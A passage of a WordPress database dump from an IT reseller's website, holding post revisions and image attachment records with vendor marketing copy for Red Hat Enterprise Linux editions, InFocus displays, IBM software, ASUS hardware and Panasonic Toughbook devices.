Enterprise Linux Server for HPC, you can:</strong>\r\n<ul>\r\n 	<li>Streamline deployment with a lightweight clustering option.</li>\r\n 	<li>Customize the platform for your environment.</li>\r\n 	<li>Minimize points of failure and security vulnerabilities.</li>\r\n 	<li>Simplify management tasks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for Power</h4>\r\nRed Hat Enterprise Linux for PowerÂ® includes additional components and versions of user packages for IBMÂ® Power Systems hardware and firmware. Deploy apps with confidence using the advanced features in IBM Power Systems and the consistency and flexibility of the market-leading Red Hat Enterprise Linux operating platform.\r\n\r\n<strong>With Red Hat Enterprise Linux for Power, you can:</strong>\r\n<ul>\r\n 	<li>Give your IT organization hardware flexibility for workloads and use cases from big data analytics to cloud computing.</li>\r\n 	<li>Support the latest IBM Power Systems features, including both big and little endian modes.</li>\r\n 	<li>Enable efficient operations and increase IT staff productivity through architecture-agnostic operating system standardization.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for IBM z Systems</h4>\r\nBuilt on a decade-plus of industry collaboration, Red Hat Enterprise Linux for IBM z Systems brings Linux apps to the mainframe, and delivers efficient management for your Linux workloads. Combine the core strengths of the IBM mainframe and IBM software with the open flexibility of Linux to reduce complexity and cost for todayâ€™s applications.\r\n\r\n<strong>With Red Hat Enterprise Linux for IBM z Systems, you can:</strong>\r\n<ul>\r\n 	<li>Give your IT organization the hardware flexibility for workloads and use cases from big data analytics to cloud computing.</li>\r\n 	<li>Run Linux-certified apps on IBM z Systems.</li>\r\n 	<li>Increase efficiency of operations and IT staff productivity through architecture-agnostic operating system standardization.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for Real Time</h4>\r\nRed Hat Enterprise Linux for Real Time is a computing platform for deadline-orientated apps and time-sensitive workloads. Using a specialized version of the Red Hat Enterprise Linux 7 kernel that has been tuned to deliver consistent low-latency response times, Red Hat Enterprise Linux for Real Time retains the reliability, scalability, and performance of the worldâ€™s leading enterprise Linux platform.\r\n\r\n<strong>With Red Hat Enterprise Linux for Real Time, you can:</strong>\r\n\r\nMinimize the potential for deviations in application performance with scheduling and performance gains.\r\nInherit the stability and maturity of Red Hat Enterprise Linux.\r\nEnjoy full application compatibility with standard Red Hat Enterprise Linux.\r\n\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for SAP Applications</h4>\r\nRed Hat Enterprise Linux for SAPÂ® Applications lets you reduce the complexity of your SAP application and database deployments. It includes the infrastructure software stack you need for optimal operation of SAP applications, plus enterprise-class service and support. As a Red Hat customer, you can get a ready-to-use, fully supported SAP environment in one package for new installations of or migrations to Red Hat Enterprise Linux.\r\n\r\n<strong>With Red Hat Enterprise Linux for SAP Applications, you can:</strong>\r\n<ul>\r\n 	<li>Deploy a platform optimized for SAP workloads.</li>\r\n 	<li>Speed issue resolution with our cooperative support agreement and streamlined customer communication.</li>\r\n 	<li>Be confident that SAP products are optimized and certified on Red Hat Enterprise Linux through collaborative engineering.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for SAP Solutions</h4>\r\nRed Hat Enterprise Linux for SAP Solutions provides an open, reliable, and scalable foundation for your most demanding data solutions. This ready-to-use environment is preconfigured for performance and optimized for SAP Solutions.\r\n\r\n<strong>With Red Hat Enterprise Linux for SAP Solutions, you can:</strong>\r\n<ul>\r\n 	<li>Simplify your SAP landscape by standardizing on 1 operating system.</li>\r\n 	<li>Deploy in on-premise or off-premise cloud environments.</li>\r\n 	<li>Speed issue resolution with our cooperative support agreement and streamlined customer communication.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Redhat','','inherit','closed','closed','','1577-revision-v1','','','2018-12-19 12:54:57','2018-12-19 04:54:57','',1577,'https://bintara.com.my/blog/2018/12/19/1577-revision-v1/',0,'revision','',0),(2553,1,'2018-12-19 14:47:44','2018-12-19 06:47:44','','ASUS ZenBook 13 UX331UN','','inherit','closed','closed','','asus-zenbook-13-ux331un','','','2018-12-19 14:47:44','2018-12-19 06:47:44','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg',0,'attachment','image/jpeg',0),(2555,1,'2018-12-19 14:50:58','2018-12-19 06:50:58','','ASUS ZenBook Flip S UX370UA','','inherit','closed','closed','','asus-zenbook-flip-s-ux370ua','','','2018-12-19 14:50:58','2018-12-19 06:50:58','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg',0,'attachment','image/jpeg',0),(2556,1,'2018-12-19 14:54:36','2018-12-19 06:54:36','','ASUS Transformer Book T101HA','','inherit','closed','closed','','asus-transformer-book-t101ha','','','2018-12-19 14:54:36','2018-12-19 06:54:36','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg',0,'attachment','image/jpeg',0),(3644,1,'2019-10-02 17:37:33','2019-10-02 09:37:33','<p style=\"text-align: center;\"><strong><em>InFocus</em> offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone/anytime/anywhere<wbr />.</strong></p><h3 style=\"text-align: center;\"><strong>Mondopad</strong></h3><p style=\"text-align: center;\">Flexible, collaborative touchscreen solutions that work the way you do.</p><h3 style=\"text-align: center;\"><strong>Collaboration that Fits</strong></h3><p style=\"text-align: center;\">The Mondopad family of touchscreen collaboration solutions help teams work together more efficientlyâ€”in the same room or around the world. Collaborate visually, capture and share information, bridge communication gaps, and strengthen teams to do better work in less time. Available with an array of features and sizes, Mondopad offers a collaboration solution that meets the unique needs of your team and your meeting space.</p><h3 style=\"text-align: center;\"><strong>MONDOPAD ULTRA</strong></h3><p style=\"text-align: center;\">The complete, all-in-one touchscreen collaboration system for efficient face-to-face collaboration with people anywhere around the globe. Conduct video conferences, draw on a whiteboard, share data, and moreâ€”all from one seamlessly integrated platform.</p><h3 style=\"text-align: center;\"><strong>Mondopad Launch</strong></h3><p style=\"text-align: center;\">Fully configurable and video conferencing-ready, Mondopad Launch offers a touchscreen display, a built-in whiteboard, multi-user casting, and a custom meeting launch interfaceâ€”so that you can quickly access your favorite apps or tools in any group workspace.</p><h3 style=\"text-align: center;\"><strong>Mondopad Core</strong></h3><p style=\"text-align: center;\">The easiest way to share information and ideas in your meeting space. Draw or write on a digital whiteboard, share content wirelessly, or browse the webâ€”Mondopad Core is the simple, affordable way to outfit any space with the most essential collaboration tools. Add a PC to design a collaboration solution for your specific needs.</p>		\n			<h2>JTouch</h2>		\n		<h3 style=\"text-align: center;\">Touchscreens that Enhance Collaboration &amp; Captivate Audiences</h3><p style=\"text-align: center;\">Whether youâ€™re in a classroom or huddle space, a conference room or auditorium, thereâ€™s a JTouch interactive display solution to fit your needs and engage your audience.</p><h4><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\" alt=\"\" width=\"300\" height=\"200\" /></h4>		\n			<h2>Key Features</h2>		\n		<ul><li>Incredibly sharp 4K or 1080p HD resolution</li><li>Content is interactive, bright and crisp in any light</li><li>Run all your apps, even the older ones, with touch</li><li>Accurate and responsive touch overlay with multi-touch capability</li></ul><ul><li>Wirelessly cast from any device, browse the web, or view documents</li><li>Create and share on an interactive whiteboard</li><li>No calibration required</li><li>Available in sizes ranging from 55- to 86-inches</li></ul>		\n		<h3 style=\"text-align: center;\"><strong>Projectors</strong></h3><p style=\"text-align: center;\">Office to classroom, ultra-portable to large-venue, InFocus projectors deliver superior performance and value in any setting.</p><h3 style=\"text-align: center;\"><strong>Classroom Projectors</strong></h3><p style=\"text-align: center;\">Incredible Value and Connectivity</p><h3 style=\"text-align: center;\"><strong>Meeting Room</strong></h3><p style=\"text-align: center;\">Superior Performance and Quality for Business</p><h3 style=\"text-align: center;\"><strong>Portable Projectors</strong></h3><p style=\"text-align: center;\">Compact, Lightweight, Powerful</p><h3 style=\"text-align: center;\"><strong>Large Venue Projectors</strong></h3><p style=\"text-align: center;\">High-performance projectors</p><h2 style=\"text-align: center;\">Jupiter by InFocus</h2><p style=\"text-align: center;\">The ability to see everything thatâ€™s important at once is invaluable. Jupiter by InFocus technologies display all your data sources and video-conferencing feeds together on a single wall.</p><h2 style=\"text-align: center;\"><strong>ConX Cloud</strong></h2><p style=\"text-align: center;\">ConX Cloud provides simple, cost-effective, cloud-based video meeting rooms for everyone at anytime.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Infocus','','inherit','closed','closed','','1531-revision-v1','','','2019-10-02 17:37:33','2019-10-02 09:37:33','',1531,'https://bintara.com.my/blog/2019/10/02/1531-revision-v1/',0,'revision','',0),(2557,1,'2018-12-19 15:02:07','2018-12-19 07:02:07','<h4>IBM Business Solution</h4>\r\n<strong>IBM Sterling Commerce</strong>\r\nUse eCommerce, connectivity and integration to deliver personalized retail experiences\r\n\r\n<strong>IBM Coremetrics</strong>\r\nAnalyze data from customer behavior to uncover trends and insights for targeted marketing\r\n\r\n<strong>IBM Unica</strong>\r\nDeliver single, personalized experiences across channels to increase customer engagement\r\n\r\n<strong>IBM Tealeaf</strong>\r\nExplore digital customer experience management and customer behavior analysis solutions\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<h4>IBM IT Infrastructure</h4>\r\n<strong>IBM Business Process Manager</strong>\r\nAutomate, manage and optimize business processes in the cloud\r\n\r\n<strong>IBM WebSphere Application Server</strong>\r\nDevelop next generation Java apps in the cloud and pay as you go\r\n\r\n<strong>IBM MQ</strong>\r\nAccelerate the integration of applications and business data across multiple platforms\r\n\r\n<strong>IBM and Apache Spark</strong>\r\nCreate algorithms and speed analytics applications to gain insights from complex data\r\n\r\n<strong>IBM Spectrum Protect</strong>\r\nProtect and recover data for virtual, physical, cloud and software-defined environments\r\n\r\n<strong>IBM z/OS Connect Enterprise Edition</strong>\r\nDevelop efficient and scalable RESTful APIs for mobile and cloud apps\r\n\r\n<strong>IBM UrbanCode Deploy</strong>\r\nAutomate the application deployment process to accelerate time to market\r\n\r\n<strong>CICS</strong>\r\nUse high-performance enterprise application servers for Z Systems with support for a range of languages\r\n\r\n<strong>IBM Information Management System (IMS)</strong>\r\nExplore a fast and security-rich hierarchical database manager for OLTP\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<h4>IBM Analytics</h4>\r\n<strong>IBM Cognos Analytics on Cloud</strong>\r\nUncover new insights quickly and easily with automated data analysis, automatic visualization and predictive analytics\r\n\r\n<strong>IBM SPSS</strong>\r\nGet deeper, more meaningful insights from your data and predict what is likely to happen next\r\n\r\n<strong>IBM Maximo</strong>\r\nManage physical assets on a common platform for better asset lifecycle and maintenance management\r\n\r\n<strong>IBM DB2 on Cloud</strong>\r\nExplore no-boundaries database software for the digital, cloud and cognitive era\r\n\r\n[maxbutton id=\"1\" ]','IBM','','inherit','closed','closed','','1530-revision-v1','','','2018-12-19 15:02:07','2018-12-19 07:02:07','',1530,'https://bintara.com.my/blog/2018/12/19/1530-revision-v1/',0,'revision','',0),(2558,1,'2018-12-19 15:16:20','2018-12-19 07:16:20','','VP278H','','inherit','closed','closed','','vp278h','','','2018-12-19 15:16:20','2018-12-19 07:16:20','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg',0,'attachment','image/jpeg',0),(2560,1,'2018-12-19 15:23:10','2018-12-19 07:23:10','<h3>IBM Software</h3>\r\n<h4>IBM Business Solution</h4>\r\n<strong>IBM Sterling Commerce</strong>\r\nUse eCommerce, connectivity and integration to deliver personalized retail experiences\r\n\r\n<strong>IBM Coremetrics</strong>\r\nAnalyze data from customer behavior to uncover trends and insights for targeted marketing\r\n\r\n<strong>IBM Unica</strong>\r\nDeliver single, personalized experiences across channels to increase customer engagement\r\n\r\n<strong>IBM Tealeaf</strong>\r\nExplore digital customer experience management and customer behavior analysis solutions\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<h4>IBM IT Infrastructure</h4>\r\n<strong>IBM Business Process Manager</strong>\r\nAutomate, manage and optimize business processes in the cloud\r\n\r\n<strong>IBM WebSphere Application Server</strong>\r\nDevelop next generation Java apps in the cloud and pay as you go\r\n\r\n<strong>IBM MQ</strong>\r\nAccelerate the integration of applications and business data across multiple platforms\r\n\r\n<strong>IBM and Apache Spark</strong>\r\nCreate algorithms and speed analytics applications to gain insights from complex data\r\n\r\n<strong>IBM Spectrum Protect</strong>\r\nProtect and recover data for virtual, physical, cloud and software-defined environments\r\n\r\n<strong>IBM z/OS Connect Enterprise Edition</strong>\r\nDevelop efficient and scalable RESTful APIs for mobile and cloud apps\r\n\r\n<strong>IBM UrbanCode Deploy</strong>\r\nAutomate the application deployment process to accelerate time to market\r\n\r\n<strong>CICS</strong>\r\nUse high-performance enterprise application servers for Z Systems with support for a range of languages\r\n\r\n<strong>IBM Information Management System (IMS)</strong>\r\nExplore a fast and security-rich hierarchical database manager for OLTP\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<h4>IBM Analytics</h4>\r\n<strong>IBM Cognos Analytics on Cloud</strong>\r\nUncover new insights quickly and easily with automated data analysis, automatic visualization and predictive analytics\r\n\r\n<strong>IBM SPSS</strong>\r\nGet deeper, more meaningful insights from your data and predict what is likely to happen next\r\n\r\n<strong>IBM Maximo</strong>\r\nManage physical assets on a common platform for better asset lifecycle and maintenance management\r\n\r\n<strong>IBM DB2 on Cloud</strong>\r\nExplore no-boundaries database software for the digital, cloud and cognitive era\r\n\r\n[maxbutton id=\"1\" ]','IBM','','inherit','closed','closed','','1530-revision-v1','','','2018-12-19 15:23:10','2018-12-19 07:23:10','',1530,'https://bintara.com.my/blog/2018/12/19/1530-revision-v1/',0,'revision','',0),(2561,1,'2018-12-19 15:23:15','2018-12-19 07:23:15','','PA329Q','','inherit','closed','closed','','pa329q','','','2018-12-19 15:23:15','2018-12-19 07:23:15','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg',0,'attachment','image/jpeg',0),(2562,1,'2018-12-19 15:23:19','2018-12-19 07:23:19','','VA326H','','inherit','closed','closed','','va326h','','','2018-12-19 15:23:19','2018-12-19 07:23:19','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg',0,'attachment','image/jpeg',0),(2563,1,'2018-12-19 15:23:23','2018-12-19 07:23:23','','VC239H','','inherit','closed','closed','','vc239h','','','2018-12-19 15:23:23','2018-12-19 07:23:23','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg',0,'attachment','image/jpeg',0),(2564,1,'2018-12-19 15:23:25','2018-12-19 07:23:25','','VP228HE','','inherit','closed','closed','','vp228he','','','2018-12-19 15:23:25','2018-12-19 07:23:25','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg',0,'attachment','image/jpeg',0),(2565,1,'2018-12-19 15:49:26','2018-12-19 07:49:26','','VZ249H','','inherit','closed','closed','','vz249h','','','2018-12-19 15:49:26','2018-12-19 07:49:26','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg',0,'attachment','image/jpeg',0),(2566,1,'2018-12-19 16:02:19','2018-12-19 08:02:19','','MB169B+','','inherit','closed','closed','','mb169b-2','','','2018-12-19 16:02:19','2018-12-19 08:02:19','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg',0,'attachment','image/jpeg',0),(2567,1,'2018-12-19 16:18:11','2018-12-19 08:18:11','','ASUSPRO E520','','inherit','closed','closed','','asuspro-e520','','','2018-12-19 16:18:11','2018-12-19 08:18:11','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg',0,'attachment','image/jpeg',0),(2568,1,'2018-12-19 16:20:16','2018-12-19 08:20:16','','ASUS Chromebox 3','','inherit','closed','closed','','asus-chromebox-3','','','2018-12-19 16:20:16','2018-12-19 08:20:16','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg',0,'attachment','image/jpeg',0),(2577,1,'2018-12-19 16:36:31','2018-12-19 08:36:31','','Mini PC PB60','','inherit','closed','closed','','mini-pc-pb60','','','2018-12-19 16:36:31','2018-12-19 08:36:31','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg',0,'attachment','image/jpeg',0),(2570,1,'2018-12-19 16:23:47','2018-12-19 08:23:47','','Mini PC PB40','','inherit','closed','closed','','mini-pc-pb40','','','2018-12-19 16:23:47','2018-12-19 08:23:47','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg',0,'attachment','image/jpeg',0),(2572,1,'2018-12-19 16:23:51','2018-12-19 08:23:51','','MINI PC PN60','','inherit','closed','closed','','mini-pc-pn60','','','2018-12-19 16:23:51','2018-12-19 08:23:51','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg',0,'attachment','image/jpeg',0),(2573,1,'2018-12-19 16:27:20','2018-12-19 08:27:20','','VivoMini UN65U','','inherit','closed','closed','','vivomini-un65u','','','2018-12-19 16:27:20','2018-12-19 08:27:20','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg',0,'attachment','image/jpeg',0),(2574,1,'2018-12-19 16:27:23','2018-12-19 08:27:23','','VivoMini UN68U','','inherit','closed','closed','','vivomini-un68u','','','2018-12-19 16:27:23','2018-12-19 08:27:23','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg',0,'attachment','image/jpeg',0),(2575,1,'2018-12-19 16:27:25','2018-12-19 08:27:25','','VivoMini VC65-C','','inherit','closed','closed','','vivomini-vc65-c','','','2018-12-19 16:27:25','2018-12-19 08:27:25','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg',0,'attachment','image/jpeg',0),(2576,1,'2018-12-19 16:27:27','2018-12-19 08:27:27','','VivoMini VC65-C1','','inherit','closed','closed','','vivomini-vc65-c1','','','2018-12-19 16:27:27','2018-12-19 08:27:27','',1442,'https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg',0,'attachment','image/jpeg',0),(2580,1,'2018-12-19 17:18:48','2018-12-19 09:18:48','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" 